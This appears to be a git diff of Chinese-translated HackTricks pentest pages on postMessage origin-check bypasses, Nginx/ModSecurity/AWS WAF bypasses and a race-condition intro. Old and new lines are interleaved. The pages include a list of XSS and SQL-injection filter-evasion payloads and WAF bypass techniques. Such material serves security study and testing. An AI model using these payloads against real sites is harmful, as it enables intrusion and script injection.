### 来源检查绕过
* **`event.isTrusted`** 属性被认为是安全的,因为它仅对由真实用户操作生成的事件返回 `True`。尽管如果正确实现,绕过它是具有挑战性的,但它在安全检查中的重要性是显著的。
* 在 PostMessage 事件中使用 **`indexOf()`** 进行来源验证可能容易被绕过。一个说明此漏洞的示例是:
```javascript
("https://app-sj17.marketo.com").indexOf("https://app-sj17.ma")
```
- `String.prototype.search()` 中的 **`search()`** 方法用于正则表达式,而不是字符串。传递除正则表达式以外的任何内容会导致隐式转换为正则表达式,使该方法可能不安全。这是因为在正则表达式中,点(.)充当通配符,允许使用特别设计的域绕过验证。例如:
* **`search()`** 方法来自 `String.prototype.search()`,旨在用于正则表达式,而不是字符串。传递任何非正则表达式的内容会导致隐式转换为正则表达式,使该方法可能不安全。这是因为在正则表达式中,点(.作为通配符,允许通过特殊构造的域绕过验证。例如:
```javascript
"https://www.safedomain.com".search("www.s.fedomain.com")
```
- **`match()`** 函数类似于 `search()`,处理正则表达式。如果正则表达式结构不正确,可能容易受到绕过攻击
- **`escapeHtml`** 函数旨在通过转义字符来对输入进行清理。但它不会创建新的转义对象,而是覆盖现有对象的属性。这种行为是可以被利用的。特别是,如果可以操纵对象以使其受控属性不承认 `hasOwnProperty`,则 `escapeHtml` 不会按预期执行。以下示例演示了这一点:
* **`match()`** 函数与 `search()` 类似,处理正则表达式。如果正则表达式结构不当,可能容易被绕过
* **`escapeHtml`** 函数旨在通过转义字符来清理输入。然而,它并不创建一个新的转义对象,而是覆盖现有对象的属性。这种行为可能被利用。特别是,如果一个对象可以被操控,使其受控属性不承认 `hasOwnProperty`,则 `escapeHtml` 将无法按预期执行。以下示例演示了这一点:
* 预期失败:
@ -129,18 +141,18 @@ result = u(new Error("'\"<b>\\"));
result.message; // "'"<b>\"
```
在此漏洞的背景下,`File` 对象由于其只读的 `name` 属性而容易受到利用。当在模板中使用该属性时,它不会被 `escapeHtml` 函数清理,从而导致潜在的安全风险。
- JavaScript 中的 `document.domain` 属性可以由脚本设置为缩短域名,从而在同一父域内实施更宽松的同源策略执行。
在此漏洞的背景下,`File` 对象因其只读的 `name` 属性而特别容易被利用。该属性在模板中使用时,未被 `escapeHtml` 函数清理,导致潜在的安全风险。
* JavaScript 中的 `document.domain` 属性可以由脚本设置以缩短域名,从而允许在同一父域内更宽松的同源策略执行。
### e.origin == window.origin 绕过
在使用 %%%%%% **受控的 iframe** 中嵌入网页时,理解 iframe 的来源将被设置为 null 是至关重要的。这在处理 **受控属性** 及其对安全性和功能的影响时尤为重要。
在使用 %%%%%% 嵌入网页到**沙箱 iframe** 中时,重要的是要理解 iframe 的来源将被设置为 null。这在处理**沙箱属性**及其对安全性和功能的影响时尤为重要。
通过在受控属性中指定 **`allow-popups`**,从 iframe 中打开的任何弹出窗口都会继承其父级的受控限制。这意味着,除非还包括 **`allow-popups-to-escape-sandbox`** 属性,否则弹出窗口的来源也被设置为 `null`,与 iframe 的来源相同
通过在沙箱属性中指定 **`allow-popups`**,从 iframe 内部打开的任何弹出窗口都继承其父级的沙箱限制。这意味着,除非还包括 **`allow-popups-to-escape-sandbox`** 属性,否则弹出窗口的来源也被设置为 `null`,与 iframe 的来源一致
因此,在这些条件下打开弹出窗口并从 iframe 发送消息到弹出窗口时,发送和接收端的来源都被设置为 `null`。这种情况导致 **`e.origin == window.origin`** 评估为 true`null == null`),因为 iframe 和弹出窗口共享相同的 `null` 来源值
因此,当在这些条件下打开弹出窗口并使用 **`postMessage`** 从 iframe 向弹出窗口发送消息时,发送和接收端的来源都被设置为 `null`。这种情况导致 **`e.origin == window.origin`** 评估为 true (`null == null`),因为 iframe 和弹出窗口共享相同的来源值 `null`
有关更多信息,请阅读
有关更多信息**请阅读**
{% content-ref url="bypassing-sop-with-iframes-1.md" %}
[bypassing-sop-with-iframes-1.md](bypassing-sop-with-iframes-1.md)
@ -148,25 +160,25 @@ result.message; // "'"<b>\"
### 绕过 e.source
可以检查消息是否来自脚本正在监听的同一窗口(对于来自浏览器扩展的 **内容脚本** 特别有趣,以检查消息是否来自同一页面):
可以检查消息是否来自脚本正在监听的同一窗口(特别有趣的是**来自浏览器扩展的内容脚本**检查消息是否来自同一页面):
```javascript
// If its not, return immediately.
if( received_message.source !== window ) {
return;
}
```
你可以通过创建一个**iframe**发送**postMessage**并**立即删除**它,强制消息的**`e.source`**为null。
您可以通过创建一个**iframe**,使其**发送****postMessage**并**立即删除**,来强制**`e.source`**为null。
要了解更多信息,请阅读:
有关更多信息**请阅读:**
{% content-ref url="bypassing-sop-with-iframes-2.md" %}
[bypassing-sop-with-iframes-2.md](bypassing-sop-with-iframes-2.md)
{% endcontent-ref %}
### X-Frame-Header绕过
### X-Frame-Header 绕过
为了执行这些攻击,理想情况下你可以将受害者网页放在一个`iframe`中。但是一些像`X-Frame-Header`这样的标头可能会**阻止**这种**行为**。\
在这种情况下,你仍然可以使用一种不太隐秘的攻击。你可以打开一个新标签页到受攻击的网页应用程序并与其通信:
为了理想地执行这些攻击,您将能够**将受害者网页**放入一个`iframe`中。但一些头部如`X-Frame-Header`可以**阻止**这种**行为**。\
在这些情况下,您仍然可以使用一种不太隐蔽的攻击。您可以打开一个新标签页,访问易受攻击的网络应用程序并与之通信:
```markup
<script>
var w=window.open("<url>")
@ -175,27 +187,27 @@ setTimeout(function(){w.postMessage('text here','*');}, 2000);
```
### 通过阻止主页面窃取发送给子页面的消息
在以下页面中,您可以看到如何通过在发送数据之前**阻止主页面**并利用**子页面中的 XSS**来窃取发送给**子 iframe**的**敏感 postmessage 数据**
在以下页面中,您可以看到如何通过**阻止**主页面在发送数据之前窃取发送给**子iframe**的**敏感postmessage数据**,并利用**子页面中的XSS**在数据被接收之前**泄露数据**
{% content-ref url="blocking-main-page-to-steal-postmessage.md" %}
[blocking-main-page-to-steal-postmessage.md](blocking-main-page-to-steal-postmessage.md)
{% endcontent-ref %}
### 通过修改 iframe 位置窃取消息
### 通过修改iframe位置窃取消息
如果您可以嵌入一个不包含 X-Frame-Header 的网页,其中包含另一个 iframe您可以**更改该子 iframe 的位置**,因此,如果它正在接收使用**通配符**发送的**postmessage**,攻击者可以**更改**该 iframe 的**来源**为由他控制的页面,并**窃取**消息:
如果您可以iframe一个没有X-Frame-Header的网页该网页包含另一个iframe您可以**更改该子iframe的位置**,因此如果它接收使用**通配符**发送的**postmessage**,攻击者可以**更改**该iframe的**来源**为一个**被他控制**的页面并**窃取**消息:
{% content-ref url="steal-postmessage-modifying-iframe-location.md" %}
[steal-postmessage-modifying-iframe-location.md](steal-postmessage-modifying-iframe-location.md)
{% endcontent-ref %}
### postMessage 到 Prototype Pollution 和/或 XSS
### postMessage导致原型污染和/或XSS
在通过 `postMessage` 发送的数据由 JS 执行的情况下,您可以**嵌入**该**页面**并利用**原型污染/XSS**通过 `postMessage` 发送利用程序
在通过`postMessage`发送的数据被JS执行的场景中您可以**iframe**该**页面**并**利用**原型污染/XSS通过`postMessage`发送利用代码
可以在以下链接中找到一些**非常好解释的通过 `postMessage` 的 XSS**[https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
一些**通过`postMessage`非常好地解释的XSS**可以在[https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)找到。
通过 `postMessage` 滥用**原型污染然后 XSS**的利用示例发送到一个 `iframe`
通过`postMessage`对`iframe`进行原型污染和然后XSS的利用示例
```html
<html>
<body>
@ -211,40 +223,41 @@ setTimeout(get_code, 2000);
</body>
</html>
```
## 更多信息
对于 **更多信息**
* 链接到关于[**原型污染**](../deserialization/nodejs-proto-prototype-pollution/)的页面
* 链接到关于[**XSS**](../xss-cross-site-scripting/)的页面
* 链接到关于[**客户端原型污染到XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss)的页面
* 链接到关于 [**原型污染**](../deserialization/nodejs-proto-prototype-pollution/) 的页面
* 链接到关于 [**XSS**](../xss-cross-site-scripting/) 的页面
* 链接到关于 [**客户端原型污染到 XSS**](../deserialization/nodejs-proto-prototype-pollution/#client-side-prototype-pollution-to-xss) 的页面
## 参考资料
## 参考文献
* [https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html](https://jlajara.gitlab.io/web/2020/07/17/Dom\_XSS\_PostMessage\_2.html)
* [https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd](https://dev.to/karanbamal/how-to-spot-and-exploit-postmessage-vulnerablities-36cd)
* 练习:[https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
* 练习: [https://github.com/yavolo/eventlistener-xss-recon](https://github.com/yavolo/eventlistener-xss-recon)
### [WhiteIntel](https://whiteintel.io)
<figure><img src="../../.gitbook/assets/image (1227).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) 是一个由**暗网**支持的搜索引擎,提供免费功能,用于检查公司或其客户是否受到**窃取恶意软件**的**威胁**
[**WhiteIntel**](https://whiteintel.io) 是一个由 **暗网** 驱动的搜索引擎,提供 **免费** 功能以检查公司或其客户是否被 **窃取恶意软件** **入侵**
WhiteIntel的主要目标是打击由信息窃取恶意软件导致的账户劫持和勒索软件攻击。
WhiteIntel 的主要目标是打击由于信息窃取恶意软件导致的账户接管和勒索软件攻击。
您可以访问他们的网站并免费尝试他们的引擎:
{% embed url="https://whiteintel.io" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术: <img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持HackTricks的其他方式
* 如果您想在HackTricks中看到您的**公司广告**或**下载PDF格式的HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方PEASS & HackTricks周边产品**](https://peass.creator-spring.com)
* 发现[**PEASS家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord群**](https://discord.gg/hRep4RUj7f) 或 [**电报群**](https://t.me/peass) 或在**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**上关注**我们。
* 通过向[**HackTricks**](https://github.com/carlospolop/hacktricks)和[**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github仓库提交PR来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **在 Twitter 上关注** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,26 +1,27 @@
# 代理 / WAF 防护绕过
# Proxy / WAF Protections Bypass
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术,成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想看到您的**公司在 HackTricks 中做广告**或**下载 PDF 版的 HackTricks**,请查看[**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取[**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索[**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家[**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注**我们的**Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 分享黑客技巧。
</details>
{% endhint %}
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
## 使用路径名操纵绕过 Nginx ACL 规则 <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
## 通过路径名操作绕过 Nginx ACL 规则 <a href="#heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules" id="heading-pathname-manipulation-bypassing-reverse-proxies-and-load-balancers-security-rules"></a>
技术来自[这项研究](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)。
技术 [来自这项研究](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)。
Nginx 规则示例:
```plaintext
@ -32,41 +33,41 @@ location = /admin/ {
deny all;
}
```
为了防止绕过Nginx在检查之前执行路径规范化。然而如果后端服务器执行不同的规范化删除Nginx不删除的字符可能会绕过此防御。
为了防止绕过Nginx 在检查路径之前执行路径规范化。然而,如果后端服务器执行不同的规范化(移除 Nginx 不移除的字符),则可能绕过此防御。
### **NodeJS - Express**
| Nginx版本 | **Node.js绕过字符** |
| ------------- | ----------------------------- |
| 1.22.0 | `\xA0` |
| 1.21.6 | `\xA0` |
| 1.20.2 | `\xA0`, `\x09`, `\x0C` |
| 1.18.0 | `\xA0`, `\x09`, `\x0C` |
| 1.16.1 | `\xA0`, `\x09`, `\x0C` |
| Nginx 版本 | **Node.js 绕过字符** |
| --------- | --------------------- |
| 1.22.0 | `\xA0` |
| 1.21.6 | `\xA0` |
| 1.20.2 | `\xA0`, `\x09`, `\x0C` |
| 1.18.0 | `\xA0`, `\x09`, `\x0C` |
| 1.16.1 | `\xA0`, `\x09`, `\x0C` |
### **Flask**
| Nginx版本 | **Flask绕过字符** |
| ------------- | -------------------------------------------------------------- |
| 1.22.0 | `\x85`, `\xA0` |
| 1.21.6 | `\x85`, `\xA0` |
| 1.20.2 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| 1.18.0 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| 1.16.1 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| Nginx 版本 | **Flask 绕过字符** |
| --------- | ------------------------------------------------------ |
| 1.22.0 | `\x85`, `\xA0` |
| 1.21.6 | `\x85`, `\xA0` |
| 1.20.2 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| 1.18.0 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
| 1.16.1 | `\x85`, `\xA0`, `\x1F`, `\x1E`, `\x1D`, `\x1C`, `\x0C`, `\x0B` |
### **Spring Boot**
| Nginx版本 | **Spring Boot绕过字符** |
| ------------- | --------------------------------- |
| 1.22.0 | `;` |
| 1.21.6 | `;` |
| 1.20.2 | `\x09`, `;` |
| 1.18.0 | `\x09`, `;` |
| 1.16.1 | `\x09`, `;` |
| Nginx 版本 | **Spring Boot 绕过字符** |
| --------- | ------------------------- |
| 1.22.0 | `;` |
| 1.21.6 | `;` |
| 1.20.2 | `\x09`, `;` |
| 1.18.0 | `\x09`, `;` |
| 1.16.1 | `\x09`, `;` |
### **PHP-FPM**
Nginx FPM配置
Nginx FPM 配置:
```plaintext
location = /admin.php {
deny all;
@ -77,32 +78,32 @@ include snippets/fastcgi-php.conf;
fastcgi_pass unix:/run/php/php8.1-fpm.sock;
}
```
Nginx 被配置为阻止访问 `/admin.php`,但可以通过访问 `/admin.php/index.php` 来绕过此限制。
Nginx 被配置为阻止`/admin.php` 的访问,但可以通过访问 `/admin.php/index.php` 来绕过此限制。
### 如何
### 如何防
```plaintext
location ~* ^/admin {
deny all;
}
```
## 绕过 Mod 安全规则 <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
## 绕过 Mod Security 规则 <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
### 路径混淆
[**在这篇文章中**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)解释了 ModSecurity v3直到3.0.12版本**不正确地实现了`REQUEST_FILENAME`**变量,该变量应该包含访问的路径(直到参数的开头。这是因为它执行了URL解码以获取路径。\
因此,在 mod 安全中,像`http://example.com/foo%3f';alert(1);foo=`这样的请求将假定路径只是`/foo`,因为`%3f`被转换为`?`结束了 URL 路径,但实际上服务器收到的路径将是`/foo%3f';alert(1);foo=`
[**在这篇文章中**](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/) 解释了 ModSecurity v3直到 3.0.12**不正确地实现了 `REQUEST_FILENAME`** 变量,该变量应该包含访问的路径(直到参数开始)。这是因为它执行了 URL 解码以获取路径。\
因此,`http://example.com/foo%3f';alert(1);foo=` 这样的请求在 mod security 中将认为路径只是 `/foo`,因为 `%3f` 被转换为 `?`,结束了 URL 路径,但实际上服务器接收到的路径将是 `/foo%3f';alert(1);foo=`
变量`REQUEST_BASENAME`和`PATH_INFO`也受到了这个 bug 的影响。
变量 `REQUEST_BASENAME``PATH_INFO` 也受到此错误的影响。
在 Mod 安全的第2版中也发生了类似的情况允许绕过防止用户访问与备份文件相关的特定扩展名文件(如`.bak`的保护,只需发送点 URL 编码为`%2e`,例如:`https://example.com/backup%2ebak`。
在 Mod Security 的版本 2 中发生了类似的情况,允许绕过一种保护,该保护阻止用户访问与备份文件相关的特定扩展名文件( `.bak`),只需通过发送点 URL 编码为 `%2e`,例如:`https://example.com/backup%2ebak`。
## 绕过 AWS WAF ACL <a href="#heading-bypassing-aws-waf-acl" id="heading-bypassing-aws-waf-acl"></a>
### 格式错误的
### 格式错误的头
[这项研究](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)提到,可以通过发送一个 AWS 无法正确解析但后端服务器可以解析的“格式错误”标头来绕过应用于 HTTP 标头的 AWS WAF 规则
[这项研究](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies) 提到可以通过发送一个“格式错误”的头部来绕过应用于 HTTP 头部的 AWS WAF 规则,该头部未被 AWS 正确解析,但被后端服务器解析
例如,发送以下带有 SQL 注入的请求标头 X-Query
例如,发送以下请求,在头部 X-Query 中包含 SQL 注入
```http
GET / HTTP/1.1\r\n
Host: target.com\r\n
@ -111,28 +112,112 @@ X-Query: Value\r\n
Connection: close\r\n
\r\n
```
在过去,可以绕过 AWS WAF因为它无法理解下一行是头值的一部分,而 NODEJS 服务器可以(已修复)。
可以绕过AWS WAF因为它无法理解下一行是头值的一部分而NODEJS服务器可以这个问题修复)。
## 参考
## 通用WAF绕过
### 请求大小限制
通常WAF对请求的长度有一定的限制如果POST/PUT/PATCH请求超过该限制WAF将不会检查该请求。
* 对于AWS WAF您可以[**查看文档**](https://docs.aws.amazon.com/waf/latest/developerguide/limits.html)**:**
<table data-header-hidden><thead><tr><th width="687"></th><th></th></tr></thead><tbody><tr><td>可以检查的应用负载均衡器和AWS AppSync保护的Web请求体的最大大小</td><td>8 KB</td></tr><tr><td>可以检查的CloudFront、API Gateway、Amazon Cognito、App Runner和Verified Access保护的Web请求体的最大大小**</td><td>64 KB</td></tr></tbody></table>
* 来自[**Azure文档**](https://learn.microsoft.com/en-us/azure/web-application-firewall/ag/application-gateway-waf-request-size-limits)**:**
较旧的Web应用防火墙使用核心规则集3.1(或更低版本)允许大于**128 KB**的消息通过关闭请求体检查但这些消息不会被检查是否存在漏洞。对于较新版本核心规则集3.2或更高版本),可以通过禁用最大请求体限制来实现。当请求超过大小限制时:
如果**预防模式**:记录并阻止请求。\
如果**检测模式**:检查到限制,忽略其余部分,并在`Content-Length`超过限制时记录。
* 来自[**Akamai**](https://community.akamai.com/customers/s/article/Can-WAF-inspect-all-arguments-and-values-in-request-body?language=en_US)**:**
默认情况下WAF仅检查请求的前8KB。通过添加高级元数据可以将限制增加到128KB。
* 来自[**Cloudflare**](https://developers.cloudflare.com/ruleset-engine/rules-language/fields/#http-request-body-fields)**:**
最多128KB。
### 混淆 <a href="#obfuscation" id="obfuscation"></a>
```bash
# IIS, ASP Clasic
<%s%cr%u0131pt> == <script>
# Path blacklist bypass - Tomcat
/path1/path2/ == ;/path1;foo/path2;bar/;
```
### Unicode 兼容性 <a href="#unicode-compatability" id="unicode-compatability"></a>
根据 Unicode 规范化的实现(更多信息 [这里](https://jlajara.gitlab.io/Bypass\_WAF\_Unicode)),共享 Unicode 兼容性的字符可能能够绕过 WAF 并作为预期的有效负载执行。兼容字符可以在 [这里](https://www.compart.com/en/unicode) 找到。
#### 示例 <a href="#example" id="example"></a>
```bash
# under the NFKD normalization algorithm, the characters on the left translate
# to the XSS payload on the right
img src⁼p onerror⁼prompt⁽1⁾﹥ --> img src=p onerror='prompt(1)'>
```
### H2C Smuggling <a href="#ip-rotation" id="ip-rotation"></a>
{% content-ref url="h2c-smuggling.md" %}
[h2c-smuggling.md](h2c-smuggling.md)
{% endcontent-ref %}
### IP Rotation <a href="#ip-rotation" id="ip-rotation"></a>
* [https://github.com/ustayready/fireprox](https://github.com/ustayready/fireprox): 生成一个API网关URL以供ffuf使用
* [https://github.com/rootcathacking/catspin](https://github.com/rootcathacking/catspin): 类似于fireprox
* [https://github.com/PortSwigger/ip-rotate](https://github.com/PortSwigger/ip-rotate): 使用API网关IP的Burp Suite插件
* [https://github.com/fyoorer/ShadowClone](https://github.com/fyoorer/ShadowClone): 根据输入文件大小和拆分因子动态确定激活的容器实例数量输入被拆分为多个块以进行并行执行例如100个实例处理来自10,000行输入文件的100个块拆分因子为100行。
### Regex Bypasses
可以使用不同的技术来绕过防火墙上的正则表达式过滤器。示例包括交替大小写、添加换行符和编码有效负载。各种绕过的资源可以在[PayloadsAllTheThings](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XSS%20Injection/README.md#filter-bypass-and-exotic-payloads)和[OWASP](https://cheatsheetseries.owasp.org/cheatsheets/XSS\_Filter\_Evasion\_Cheat\_Sheet.html)找到。以下示例来自[这篇文章](https://medium.com/@allypetitt/5-ways-i-bypassed-your-web-application-firewall-waf-43852a43a1c2)。
```bash
<sCrIpT>alert(XSS)</sCriPt> #changing the case of the tag
<<script>alert(XSS)</script> #prepending an additional "<"
<script>alert(XSS) // #removing the closing tag
<script>alert`XSS`</script> #using backticks instead of parenetheses
java%0ascript:alert(1) #using encoded newline characters
<iframe src=http://malicous.com < #double open angle brackets
<STYLE>.classname{background-image:url("javascript:alert(XSS)");}</STYLE> #uncommon tags
<img/src=1/onerror=alert(0)> #bypass space filter by using / where a space is expected
<a aa aaa aaaa aaaaa aaaaaa aaaaaaa aaaaaaaa aaaaaaaaaa href=javascript:alert(1)>xss</a> #extra characters
Function("ale"+"rt(1)")(); #using uncommon functions besides alert, console.log, and prompt
javascript:74163166147401571561541571411447514115414516216450615176 #octal encoding
<iframe src="javascript:alert(`xss`)"> #unicode encoding
/?id=1+un/**/ion+sel/**/ect+1,2,3-- #using comments in SQL query to break up statement
new Function`alt\`6\``; #using backticks instead of parentheses
data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+ #base64 encoding the javascript
%26%2397;lert(1) #using HTML encoding
<a src="%0Aj%0Aa%0Av%0Aa%0As%0Ac%0Ar%0Ai%0Ap%0At%0A%3Aconfirm(XSS)"> #Using Line Feed (LF) line breaks
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=confirm()> # use any chars that aren't letters, numbers, or encapsulation chars between event handler and equal sign (only works on Gecko engine)
```
## 工具
* [**nowafpls**](https://github.com/assetnote/nowafpls): Burp 插件,通过长度向请求添加垃圾数据以绕过 WAF
## 参考资料
* [https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies](https://rafa.hashnode.dev/exploiting-http-parsers-inconsistencies)
* [https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/](https://blog.sicuranext.com/modsecurity-path-confusion-bugs-bypass/)
* [https://www.youtube.com/watch?v=0OMmWtU2Y\_g](https://www.youtube.com/watch?v=0OMmWtU2Y\_g)
<figure><img src="https://pentest.eu/RENDER_WebSec_10fps_21sec_9MB_29042024.gif" alt=""><figcaption></figcaption></figure>
{% embed url="https://websec.nl/" %}
{% hint style="success" %}
学习与实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习与实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习 AWS 黑客技术</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS 红队专家)</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
* 如果您想在 HackTricks 中看到您的 **公司广告****下载 PDF 版本的 HackTricks**,请查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* 获取 [**官方 PEASS & HackTricks 商品**](https://peass.creator-spring.com)
* 探索 [**PEASS 家族**](https://opensea.io/collection/the-peass-family),我们的独家 [**NFTs**](https://opensea.io/collection/the-peass-family)
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**电报群组**](https://t.me/peass) 或 **关注** 我们的 **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**。**
* 通过向 [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github 仓库提交 PR 来分享您的黑客技巧。
* 查看 [**订阅计划**](https://github.com/sponsors/carlospolop)!
* **加入** 💬 [**Discord 群组**](https://discord.gg/hRep4RUj7f) 或 [**Telegram 群组**](https://t.me/peass) 或 **在** **Twitter** 🐦 **上关注我们** [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
* **通过向** [**HackTricks**](https://github.com/carlospolop/hacktricks) 和 [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub 仓库提交 PR 来分享黑客技巧。
</details>
{% endhint %}

View file

@ -1,80 +1,81 @@
# 竞争条件
# Race Condition
<figure><img src="../.gitbook/assets/image (48).png" alt=""><figcaption></figcaption></figure>
\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) 可轻松构建和**自动化工作流程**,使用全球**最先进**的社区工具。\
使用 [**Trickest**](https://trickest.com/?utm_source=hacktricks&utm_medium=text&utm_campaign=ppc&utm_term=trickest&utm_content=race-condition) 轻松构建和 **自动化工作流**,由世界上 **最先进** 的社区工具提供支持。\
立即获取访问权限:
{% embed url="https://trickest.com/?utm_source=hacktricks&utm_medium=banner&utm_campaign=ppc&utm_content=race-condition" %}
{% hint style="success" %}
学习和实践 AWS 黑客技术:<img src="/.gitbook/assets/arte.png" alt="" data-size="line">[**HackTricks 培训 AWS 红队专家 (ARTE)**](https://training.hacktricks.xyz/courses/arte)<img src="/.gitbook/assets/arte.png" alt="" data-size="line">\
学习和实践 GCP 黑客技术:<img src="/.gitbook/assets/grte.png" alt="" data-size="line">[**HackTricks 培训 GCP 红队专家 (GRTE)**<img src="/.gitbook/assets/grte.png" alt="" data-size="line">](https://training.hacktricks.xyz/courses/grte)
<details>
<summary><strong>从零开始学习AWS黑客技术成为专家</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTEHackTricks AWS Red Team Expert</strong></a><strong></strong></summary>
<summary>支持 HackTricks</summary>
支持 HackTricks 的其他方式:
